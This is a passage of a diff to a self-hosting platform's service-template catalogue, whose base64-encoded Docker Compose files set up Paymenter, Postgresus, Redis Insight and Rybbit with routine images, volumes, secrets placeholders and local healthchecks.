CAgLSAnQVVUT19SRVNFVF9HVUlMRF9OT19PTkxJTkVfUExBWUVSUz0ke0FVVE9fUkVTRVRfR1VJTERfTk9fT05MSU5FX1BMQVlFUlM6P0ZhbHNlfScKICAgICAgLSAnQVVUT19SRVNFVF9HVUlMRF9USU1FX05PX09OTElORV9QTEFZRVJTPSR7QVVUT19SRVNFVF9HVUlMRF9USU1FX05PX09OTElORV9QTEFZRVJTOj83Mi4wMDAwMDB9JwogICAgICAtICdHVUlMRF9QTEFZRVJfTUFYX05VTT0ke0dVSUxEX1BMQVlFUl9NQVhfTlVNOj8yMH0nCiAgICAgIC0gJ0JBU0VfQ0FNUF9NQVhfTlVNX0lOX0dVSUxEPSR7QkFTRV9DQU1QX01BWF9OVU1fSU5fR1VJTEQ6PzR9JwogICAgICAtICdQQUxfRUdHX0RFRkFVTFRfSEFUQ0hJTkdfVElNRT0ke1BBTF9FR0dfREVGQVVMVF9IQVRDSElOR19USU1FOj83Mi4wMDAwMDB9JwogICAgICAtICdXT1JLX1NQRUVEX1JBVEU9JHtXT1JLX1NQRUVEX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQVVUT19TQVZFX1NQQU49JHtBVVRPX1NBVkVfU1BBTjo/MzAuMDAwMDAwfScKICAgICAgLSAnSVNfTVVMVElQTEFZPSR7SVNfTVVMVElQTEFZOj9GYWxzZX0nCiAgICAgIC0gJ0lTX1BWUD0ke0lTX1BWUDo/RmFsc2V9JwogICAgICAtICdIQVJEQ09SRT0ke0hBUkRDT1JFOj9GYWxzZX0nCiAgICAgIC0gJ1BBTF9MT1NUPSR7UEFMX0xPU1Q6P0ZhbHNlfScKICAgICAgLSAnQ0FOX1BJQ0tVUF9PVEhFUl9HVUlMRF9ERUFUSF9QRU5BTFRZX0RST1A9JHtDQU5fUElDS1VQX09USEVSX0dVSUxEX0RFQVRIX1BFTkFMVFlfRFJPUDo/RmFsc2V9JwogICAgICAtICdFTkFCTEVfTk9OX0xPR0lOX1BFTkFMVFk9JHtFTkFCTEVfTk9OX0xPR0lOX1BFTkFMVFk6P1RydWV9JwogICAgICAtICdFTkFCTEVfRkFTVF9UUkFWRUw9JHtFTkFCTEVfRkFTVF9UUkFWRUw6P1RydWV9JwogICAgICAtICdJU19TVEFSVF9MT0NBVElPTl9TRUxFQ1RfQllfTUFQPSR7SVNfU1RBUlRfTE9DQVRJT05fU0VMRUNUX0JZX01BUDo/VHJ1ZX0nCiAgICAgIC0gJ0VYSVNUX1BMQVlFUl9BRlRFUl9MT0dPVVQ9JHtFWElTVF9QTEFZRVJfQUZURVJfTE9HT1VUOj9GYWxzZX0nCiAgICAgIC0gJ0VOQUJMRV9ERUZFTlNFX09USEVSX0dVSUxEX1BMQVlFUj0ke0VOQUJMRV9ERUZFTlNFX09USEVSX0dVSUxEX1BMQVlFUjo/RmFsc2V9JwogICAgICAtICdJTlZJU0lCTEVfT1RIRVJfR1VJTERfQkFTRV9DQU1QX0FSRUFfRlg9JHtJTlZJU0lCTEVfT1RIRVJfR1VJTERfQkFTRV9DQU1QX0FSRUFfRlg6P0ZhbHNlfScKICAgICAgLSAnQlVJTERfQVJFQV9MSU1JVD0ke0JVSUxEX0FSRUFfTElNSVQ6P0ZhbHNlfScKICAgICAgLSAnSVRFTV9XRUlHSFRfUkFURT0ke0lURU1fV0VJR0hUX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnQ09PUF9QTEFZRVJfTUFYX05VTT0ke0NPT1BfUExBWUVSX01BWF9OVU06PzR9JwogICAgICAtICdSRUdJT049JHtSRUdJT046LX0nCiAgICAgIC0gJ1VTRUFVVEg9JHtVU0VBVVRIOj9UcnVlfScKICAgICAgLSAnQkFOX0xJU1RfVVJMPSR7QkFOX0xJU1RfVVJMOj9odHRwczovL2FwaS5wYWx3b3JsZGdhbWUuY29tL2FwaS9iYW5saXN0LnR4dH0nCiAgICAgIC0gJ1JFU1RfQVBJX0VOQUJMRUQ9JHtSRVNUX0FQSV9FTkFCTEVEOj9GYWxzZX0nCiAgICAgIC0gJ1JFU1RfQVBJX1BPUlQ9JHtSRVNUX0FQSV9QT1JUOj84MjEyfScKICAgICAgLSAnU0hPV19QTEFZRVJfTElTVD0ke1NIT1dfUExBWUVSX0xJU1Q6P1RydWV9JwogICAgICAtICdFTkFCTEVfUFJFREFUT1JfQk9TU19QQUw9JHtFTkFCTEVfUFJFREFUT1JfQk9TU19QQUw6P1RydWV9JwogICAgICAtICdNQVhfQlVJTERJTkdfTElNSVRfTlVNPSR7TUFYX0JVSUxESU5HX0xJTUlUX05VTTo/MH0nCiAgICAgIC0gJ1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFPSR7U0VSVkVSX1JFUExJQ0FURV9QQVdOX0NVTExfRElTVEFOQ0U6PzE1MDAwLjAwMDAwMH0nCiAgICAgIC0gJ1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFX0lOX0JBU0VfQ0FNUD0ke1NFUlZFUl9SRVBMSUNBVEVfUEFXTl9DVUxMX0RJU1RBTkNFX0lOX0JBU0VfQ0FNUDo/NTAwMC4wMDAwMDB9JwogICAgICAtICdDUk9TU1BMQVlfUExBVEZPUk1TPSR7Q1JPU1NQTEFZX1BMQVRGT1JNUzo/KFN0ZWFtLFhib3gsUFM1LE1hYyl9JwogICAgICAtICdVU0VfQkFDS1VQX1NBVkVfREFUQT0ke1VTRV9CQUNLVVBfU0FWRV9EQVRBOj9UcnVlfScKICAgICAgLSAnVVNFX0RFUE9UX0RPV05MT0FERVI9JHtVU0VfREVQT1RfRE9XTkxPQURFUjo/RmFsc2V9JwogICAgICAtICdJTlNUQUxMX0JFVEFfSU5TSURFUj0ke0lOU1RBTExfQkVUQV9JTlNJREVSOj9GYWxzZX0nCiAgICAgIC0gJ0FMTE9XX0dMT0JBTF9QQUxCT1hfRVhQT1JUPSR7QUxMT1dfR0xPQkFMX1BBTEJPWF9FWFBPUlQ6P1RydWV9JwogICAgICAtICdBTExPV19HTE9CQUxfUEFMQk9YX0lNUE9SVD0ke0FMTE9XX0dMT0JBTF9QQUxCT1hfSU1QT1JUOj9GYWxzZX0nCiAgICAgIC0gJ0VRVUlQTUVOVF9EVVJBQklMSVRZX0RBTUFHRV9SQVRFPSR7RVFVSVBNRU5UX0RVUkFCSUxJVFlfREFNQUdFX1JBVEU6PzEuMDAwMDAwfScKICAgICAgLSAnSVRFTV9DT05UQUlORVJfRk9SQ0VfTUFSS19ESVJUWV9JTlRFUlZBTD0ke0lURU1fQ09OVEFJTkVSX0ZPUkNFX01BUktfRElSVFlfSU5URVJWQUw6PzEuMDAwMDAwfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19TVFJPTkdNRU09JHtCT1g2NF9EWU5BUkVDX1NUUk9OR01FTTotfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19CSUdCTE9DSz0ke0JPWDY0X0RZTkFSRUNfQklHQkxPQ0s6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfU0FGRUZMQUdTPSR7Qk9YNjRfRFlOQVJFQ19TQUZFRkxBR1M6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfRkFTVFJPVU5EPSR7Qk9YNjRfRFlOQVJFQ19GQVNUUk9VTkQ6LX0nCiAgICAgIC0gJ0JPWDY0X0RZTkFSRUNfRkFTVE5BTj0ke0JPWDY0X0RZTkFSRUNfRkFTVE5BTjotfScKICAgICAgLSAnQk9YNjRfRFlOQVJFQ19YODdET1VCTEU9JHtCT1g2NF9EWU5BUkVDX1g4N0RPVUJMRTotfScK", + "tags": null, + "category": null, + "logo": "svgs/default.webp", + "minversion": "0.0.0" + }, "paperless": { "documentation": "https://docs.paperless-ngx.com/configuration/?utm_source=coolify.io", "slogan": "Paperless-ngx is a community-supported open-source document management system that transforms your physical documents into a searchable online archive so you can keep, well, less paper.", @@ -3173,7 +3216,7 @@ "paymenter": { "documentation": "https://paymenter.org/docs/guides/docker?utm_source=coolify.io", "slogan": "Open-Source Billing, Built for Hosting", - "compose": "c2VydmljZXM6CiAgcGF5bWVudGVyOgogICAgaW1hZ2U6ICdnaGNyLmlvL3BheW1lbnRlci9wYXltZW50ZXI6bGF0ZXN0JwogICAgdm9sdW1lczoKICAgICAgLSAnYXBwX2xvZ3M6L2FwcC9zdG9yYWdlL2xvZ3MnCiAgICAgIC0gJ2FwcF9wdWJsaWM6L2FwcC9zdG9yYWdlL3B1YmxpYycKICAgIGVudmlyb25tZW50OgogICAgICBTRVJWSUNFX0ZRRE5fUEFZTUVOVEVSOiAnJHtTRVJWSUNFX0ZRRE5fUEFZTUVOVEVSXzgwfScKICAgICAgREJfREFUQUJBU0U6ICcke01ZU1FMX0RBVEFCQVNFOi1wYXltZW50ZXItZGJ9JwogICAgICBEQl9QQVNTV09SRDogJyR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICAgIERCX1VTRVJOQU1FOiAnJHtTRVJWSUNFX1VTRVJfTVlTUUx9JwogICAgICBBUFBfRU5WOiBwcm9kdWN0aW9uCiAgICAgIENBQ0hFX1NUT1JFOiByZWRpcwogICAgICBTRVNTSU9OX0RSSVZFUjogcmVkaXMKICAgICAgUVVFVUVfQ09OTkVDVElPTjogcmVkaXMKICAgICAgUkVESVNfSE9TVDogcmVkaXMKICAgICAgUkVESVNfVVNFUk5BTUU6IGRlZmF1bHQKICAgICAgUkVESVNfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfNjRfUkVESVN9JwogICAgICBEQl9DT05ORUNUSU9OOiBtYXJpYWRiCiAgICAgIERCX0hPU1Q6IG1hcmlhZGIKICAgICAgREJfUE9SVDogMzMwNgogICAgICBBUFBfS0VZOiAnJHtTRVJWSUNFX0JBU0U2NF9LRVl9JwogICAgZGVwZW5kc19vbjoKICAgICAgbWFyaWFkYjoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2VfaGVhbHRoeQogICAgICByZWRpczoKICAgICAgICBjb25kaXRpb246IHNlcnZpY2Vfc3RhcnRlZAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdjdXJsIC1zZiBodHRwOi8vbG9jYWxob3N0OjgwIHx8IGV4aXQgMScKICAgICAgaW50ZXJ2YWw6IDEwcwogICAgICB0aW1lb3V0OiAxcwogICAgICByZXRyaWVzOiAzCiAgbWFyaWFkYjoKICAgIGltYWdlOiAnbWFyaWFkYjoxMScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3BheW1lbnRlcl9tYXJpYWRiX2RhdGE6L3Zhci9saWIvbXlzcWwnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTVlTUUxfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UfScKICAgICAgLSAnTVlTUUxfREFUQUJBU0U9JHtNWVNRTF9EQVRBQkFTRTotcGF5bWVudGVyLWRifScKICAgICAgLSAnTVlTUUxfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaGVhbHRoY2hlY2suc2gKICAgICAgICAtICctLWNvbm5lY3QnCiAgICAgICAgLSAnLS1pbm5vZGJfaW5pdGlhbGl6ZWQnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6YWxwaW5lJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdyZWRpcy1jbGkgcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwo=", + "compose": "c2VydmljZXM6CiAgcGF5bWVudGVyOgogICAgaW1hZ2U6ICdnaGNyLmlvL3BheW1lbnRlci9wYXltZW50ZXI6djEuNC41JwogICAgdm9sdW1lczoKICAgICAgLSAnYXBwX2xvZ3M6L2FwcC9zdG9yYWdlL2xvZ3MnCiAgICAgIC0gJ2V4dGVuc3Rpb25zOi9hcHAvZXh0ZW5zaW9ucycKICAgICAgLSAndGhlbWVzOi9hcHAvdGhlbWVzJwogICAgICAtICdhcHBfc3RvcmFnZTovYXBwL3N0b3JhZ2UvYXBwJwogICAgICAtICdhcHBfcHVibGljX3N0b3JhZ2U6L2FwcC9zdG9yYWdlL2FwcC9wdWJsaWMnCiAgICBlbnZpcm9ubWVudDoKICAgICAgU0VSVklDRV9GUUROX1BBWU1FTlRFUjogJyR7U0VSVklDRV9GUUROX1BBWU1FTlRFUl84MH0nCiAgICAgIERCX0RBVEFCQVNFOiAnJHtNWVNRTF9EQVRBQkFTRTotcGF5bWVudGVyLWRifScKICAgICAgREJfUEFTU1dPUkQ6ICcke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUx9JwogICAgICBEQl9VU0VSTkFNRTogJyR7U0VSVklDRV9VU0VSX01ZU1FMfScKICAgICAgQVBQX0VOVjogcHJvZHVjdGlvbgogICAgICBDQUNIRV9TVE9SRTogcmVkaXMKICAgICAgU0VTU0lPTl9EUklWRVI6IHJlZGlzCiAgICAgIFFVRVVFX0NPTk5FQ1RJT046IHJlZGlzCiAgICAgIFJFRElTX0hPU1Q6IHJlZGlzCiAgICAgIFJFRElTX1VTRVJOQU1FOiBkZWZhdWx0CiAgICAgIFJFRElTX1BBU1NXT1JEOiAnJHtTRVJWSUNFX1BBU1NXT1JEXzY0X1JFRElTfScKICAgICAgREJfQ09OTkVDVElPTjogbWFyaWFkYgogICAgICBEQl9IT1NUOiBtYXJpYWRiCiAgICAgIERCX1BPUlQ6IDMzMDYKICAgICAgQVBQX0tFWTogJyR7U0VSVklDRV9CQVNFNjRfS0VZfScKICAgIGRlcGVuZHNfb246CiAgICAgIG1hcmlhZGI6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcmVkaXM6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX3N0YXJ0ZWQKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ELVNIRUxMCiAgICAgICAgLSAnY3VybCAtc2YgaHR0cDovL2xvY2FsaG9zdDo4MCB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwogIG1hcmlhZGI6CiAgICBpbWFnZTogJ21hcmlhZGI6MTEuOCcKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3BheW1lbnRlcl9tYXJpYWRiX2RhdGE6L3Zhci9saWIvbXlzcWwnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnTVlTUUxfUk9PVF9QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfTVlTUUxST09UfScKICAgICAgLSAnTVlTUUxfREFUQUJBU0U9JHtNWVNRTF9EQVRBQkFTRTotcGF5bWVudGVyLWRifScKICAgICAgLSAnTVlTUUxfVVNFUj0ke1NFUlZJQ0VfVVNFUl9NWVNRTH0nCiAgICAgIC0gJ01ZU1FMX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9NWVNRTH0nCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gaGVhbHRoY2hlY2suc2gKICAgICAgICAtICctLWNvbm5lY3QnCiAgICAgICAgLSAnLS1pbm5vZGJfaW5pdGlhbGl6ZWQnCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAyMHMKICAgICAgcmV0cmllczogMTAKICByZWRpczoKICAgIGltYWdlOiAncmVkaXM6YWxwaW5lJwogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICdyZWRpcy1jbGkgcGluZyB8fCBleGl0IDEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogMXMKICAgICAgcmV0cmllczogMwo=", "tags": [ "automation", "billing", @@ -3375,6 +3418,19 @@ "minversion": "0.0.0", "port": "9000" }, + "postgresus": { + "documentation": "https://postgresus.com/#guide?utm_source=coolify.io", + "slogan": "Postgresus is a free, open source and self-hosted tool to backup PostgreSQL.", + "compose": "c2VydmljZXM6CiAgcG9zdGdyZXN1czoKICAgIGltYWdlOiAncm9zdGlzbGF2ZHVnaW4vcG9zdGdyZXN1czo3ZmI1OWJiNWQwMmZiYWY4NTZiMGJjZmM3YTA3ODY1NzU4MThiOTZmJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gU0VSVklDRV9GUUROX1BPU1RHUkVTVVNfNDAwNQogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXN1cy1kYXRhOi9wb3N0Z3Jlc3VzLWRhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy1xTy0nCiAgICAgICAgLSAnaHR0cDovL2xvY2FsaG9zdDo0MDA1L2FwaS92MS9zeXN0ZW0vaGVhbHRoJwogICAgICBpbnRlcnZhbDogNXMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDUK", + "tags": [ + "postgres", + "backup" + ], + "category": "devtools", + "logo": "svgs/postgresus.svg", + "minversion": "0.0.0", + "port": "4005" + }, "postiz": { "documentation": "https://docs.postiz.com?utm_source=coolify.io", "slogan": "Open source social media scheduling tool.", @@ -3600,7 +3656,7 @@ "redis-insight": { "documentation": "https://redis.io/docs/latest/operate/redisinsight/?utm_source=coolify.io", "slogan": "Redis Insight lets you do both GUI- and CLI-based interactions in a fully-featured desktop GUI client.", - "compose": "c2VydmljZXM6CiAgcmVkaXNpbnNpZ2h0OgogICAgaW1hZ2U6ICdyZWRpcy9yZWRpc2luc2lnaHQ6Mi43MCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9SRURJU0lOU0lHSFRfNTU0MAogICAgICAtIFJJX0FQUF9IT1NUPTAuMC4wLjAKICAgICAgLSBSSV9BUFBfUE9SVD01NTQwCiAgICAgIC0gJ1JJX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9SSV9FTkNSWVBUSU9OX0tFWX0nCiAgICAgIC0gJ1JJX0xPR19MRVZFTD0ke1JJX0xPR19MRVZFTDotaW5mb30nCiAgICAgIC0gJ1JJX0ZJTEVTX0xPR0dFUj0ke1JJX0ZJTEVTX0xPR0dFUjotdHJ1ZX0nCiAgICAgIC0gJ1JJX1NURE9VVF9MT0dHRVI9JHtSSV9TVERPVVRfTE9HR0VSOi10cnVlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzX2luc2lnaHRfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovL2xvY2FsaG9zdDo1NTQwJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCg==", + "compose": "c2VydmljZXM6CiAgcmVkaXNpbnNpZ2h0OgogICAgaW1hZ2U6ICdyZWRpcy9yZWRpc2luc2lnaHQ6Mi43MCcKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9SRURJU0lOU0lHSFRfNTU0MAogICAgICAtIFJJX0FQUF9IT1NUPTAuMC4wLjAKICAgICAgLSBSSV9BUFBfUE9SVD01NTQwCiAgICAgIC0gJ1JJX0VOQ1JZUFRJT05fS0VZPSR7U0VSVklDRV9QQVNTV09SRF9SSV9FTkNSWVBUSU9OX0tFWX0nCiAgICAgIC0gJ1JJX0xPR19MRVZFTD0ke1JJX0xPR19MRVZFTDotaW5mb30nCiAgICAgIC0gJ1JJX0ZJTEVTX0xPR0dFUj0ke1JJX0ZJTEVTX0xPR0dFUjotdHJ1ZX0nCiAgICAgIC0gJ1JJX1NURE9VVF9MT0dHRVI9JHtSSV9TVERPVVRfTE9HR0VSOi10cnVlfScKICAgIHZvbHVtZXM6CiAgICAgIC0gJ3JlZGlzX2luc2lnaHRfZGF0YTovZGF0YScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzAuMC4wLjA6NTU0MC9hcGkvaGVhbHRoJwogICAgICBpbnRlcnZhbDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHN0YXJ0X3BlcmlvZDogMTBzCg==", "tags": [ "redis", "gui", @@ -3664,7 +3720,7 @@ "rybbit": { "documentation": "https://rybbit.io/docs?utm_source=coolify.io", "slogan": "Open-source, privacy-first web analytics.", - "compose": "c2VydmljZXM6CiAgcnliYml0OgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtY2xpZW50OnYxLjYuMScKICAgIGVudmlyb25tZW50OgogICAgICAtIFNFUlZJQ0VfRlFETl9SWUJCSVRfMzAwMgogICAgICAtIE5PREVfRU5WPXByb2R1Y3Rpb24KICAgICAgLSAnTkVYVF9QVUJMSUNfQkFDS0VORF9VUkw9JHtTRVJWSUNFX0ZRRE5fUllCQklUfScKICAgICAgLSAnTkVYVF9QVUJMSUNfRElTQUJMRV9TSUdOVVA9JHtESVNBQkxFX1NJR05VUDotZmFsc2V9JwogICAgZGVwZW5kc19vbjoKICAgICAgLSByeWJiaXRfYmFja2VuZAogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQtU0hFTEwKICAgICAgICAtICduYyAteiAxMjcuMC4wLjEgMzAwMicKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogIHJ5YmJpdF9iYWNrZW5kOgogICAgaW1hZ2U6ICdnaGNyLmlvL3J5YmJpdC1pby9yeWJiaXQtYmFja2VuZDp2MS42LjEnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBOT0RFX0VOVj1wcm9kdWN0aW9uCiAgICAgIC0gVFJVU1RfUFJPWFk9dHJ1ZQogICAgICAtICdCQVNFX1VSTD0ke1NFUlZJQ0VfRlFETl9SWUJCSVR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgICAgLSAnUE9TVEdSRVNfUEFTU1dPUkQ9JHtTRVJWSUNFX1BBU1NXT1JEX1BPU1RHUkVTfScKICAgICAgLSAnQkVUVEVSX0FVVEhfU0VDUkVUPSR7U0VSVklDRV9CQVNFNjRfNjRfQkFDS0VORH0nCiAgICAgIC0gJ0RJU0FCTEVfU0lHTlVQPSR7RElTQUJMRV9TSUdOVVA6LWZhbHNlfScKICAgICAgLSAnRElTQUJMRV9URUxFTUVUUlk9JHtESVNBQkxFX1RFTEVNRVRSWTotdHJ1ZX0nCiAgICAgIC0gJ0NMSUNLSE9VU0VfSE9TVD1odHRwOi8vcnliYml0X2NsaWNraG91c2U6ODEyMycKICAgICAgLSAnQ0xJQ0tIT1VTRV9VU0VSPSR7Q0xJQ0tIT1VTRV9VU0VSOi1kZWZhdWx0fScKICAgICAgLSAnQ0xJQ0tIT1VTRV9EQj0ke0NMSUNLSE9VU0VfREI6LWFuYWx5dGljc30nCiAgICAgIC0gUE9TVEdSRVNfSE9TVD1yeWJiaXRfcG9zdGdyZXMKICAgICAgLSBQT1NUR1JFU19QT1JUPTU0MzIKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgZGVwZW5kc19vbjoKICAgICAgcnliYml0X2NsaWNraG91c2U6CiAgICAgICAgY29uZGl0aW9uOiBzZXJ2aWNlX2hlYWx0aHkKICAgICAgcnliYml0X3Bvc3RncmVzOgogICAgICAgIGNvbmRpdGlvbjogc2VydmljZV9oZWFsdGh5CiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRAogICAgICAgIC0gd2dldAogICAgICAgIC0gJy0tbm8tdmVyYm9zZScKICAgICAgICAtICctLXRyaWVzPTEnCiAgICAgICAgLSAnLS1zcGlkZXInCiAgICAgICAgLSAnaHR0cDovLzEyNy4wLjAuMTozMDAxL2FwaS9oZWFsdGgnCiAgICAgIGludGVydmFsOiAzMHMKICAgICAgdGltZW91dDogMTBzCiAgICAgIHJldHJpZXM6IDMKICAgICAgc3RhcnRfcGVyaW9kOiAxMHMKICByeWJiaXRfcG9zdGdyZXM6CiAgICBpbWFnZTogJ3Bvc3RncmVzOjE3LjQnCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSAnUE9TVEdSRVNfREI9JHtQT1NUR1JFU19EQjotYW5hbHl0aWNzfScKICAgICAgLSAnUE9TVEdSRVNfVVNFUj0ke1BPU1RHUkVTX1VTRVI6LWZyb2d9JwogICAgICAtICdQT1NUR1JFU19QQVNTV09SRD0ke1NFUlZJQ0VfUEFTU1dPUkRfUE9TVEdSRVN9JwogICAgdm9sdW1lczoKICAgICAgLSAncG9zdGdyZXNfZGF0YTovdmFyL2xpYi9wb3N0Z3Jlc3FsL2RhdGEnCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gJ3BnX2lzcmVhZHkgLVUgJCR7UE9TVEdSRVNfVVNFUn0gLWQgJCR7UE9TVEdSRVNfREJ9JwogICAgICBpbnRlcnZhbDogMzBzCiAgICAgIHRpbWVvdXQ6IDEwcwogICAgICByZXRyaWVzOiAzCiAgcnliYml0X2NsaWNraG91c2U6CiAgICBpbWFnZTogJ2NsaWNraG91c2UvY2xpY2tob3VzZS1zZXJ2ZXI6MjUuNC4yJwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0NMSUNLSE9VU0VfREI9JHtDTElDS0hPVVNFX0RCOi1hbmFseXRpY3N9JwogICAgICAtICdDTElDS0hPVVNFX1VTRVI9JHtDTElDS0hPVVNFX1VTRVI6LWRlZmF1bHR9JwogICAgICAtICdDTElDS0hPVVNFX1BBU1NXT1JEPSR7U0VSVklDRV9QQVNTV09SRF9DTElDS0hPVVNFfScKICAgIGhlYWx0aGNoZWNrOgogICAgICB0ZXN0OgogICAgICAgIC0gQ01ECiAgICAgICAgLSB3Z2V0CiAgICAgICAgLSAnLS1uby12ZXJib3NlJwogICAgICAgIC0gJy0tdHJpZXM9MScKICAgICAgICAtICctLXNwaWRlcicKICAgICAgICAtICdodHRwOi8vbG9jYWxob3N0OjgxMjMvcGluZycKICAgICAgaW50ZXJ2YWw6IDMwcwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMwogICAgICBzdGFydF9wZXJpb2Q6IDEwcwogICAgdm9sdW1lczoKICAgICAgLSAnY2xpY2tob3VzZV9kYXRhOi92YXIvbGliL2NsaWNraG91c2UnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2VuYWJsZV9qc29uLnhtbAogICAgICAgIHRhcmdldDogL2V0Yy9jbGlja2hvdXNlLXNlcnZlci9jb25maWcuZC9lbmFibGVfanNvbi54bWwKICAgICAgICBjb250ZW50OiAiPGNsaWNraG91c2U+XG4gICAgPHNldHRpbmdzPlxuICAgICAgICA8ZW5hYmxlX2pzb25fdHlwZT4xPC9lbmFibGVfanNvbl90eXBlPlxuICAgIDwvc2V0dGluZ3M+XG48L2NsaWNraG91c2U+XG4iCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2NsaWNraG91c2VfY29uZmlnL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2NsaWNraG91c2Utc2VydmVyL2NvbmZpZy5kL2xvZ2dpbmdfcnVsZXMueG1sCiAgICAgICAgY29udGVudDogIjxjbGlja2hvdXNlPlxuICAgIDxsb2dnZXI+XG4gICAgICAgIDxsZXZlbD53YXJuaW5nPC9sZXZlbD5cbiAgICAgICAgPGNvbnNvbGU+dHJ1ZTwvY29uc29sZT5cbiAgICA8L2xvZ2dlcj5cbiAgICA8cXVlcnlfdGhyZWFkX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHF1ZXJ5X2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPHRleHRfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8dHJhY2VfbG9nIHJlbW92ZT1cInJlbW92ZVwiLz5cbiAgICA8bWV0cmljX2xvZyByZW1vdmU9XCJyZW1vdmVcIi8+XG4gICAgPG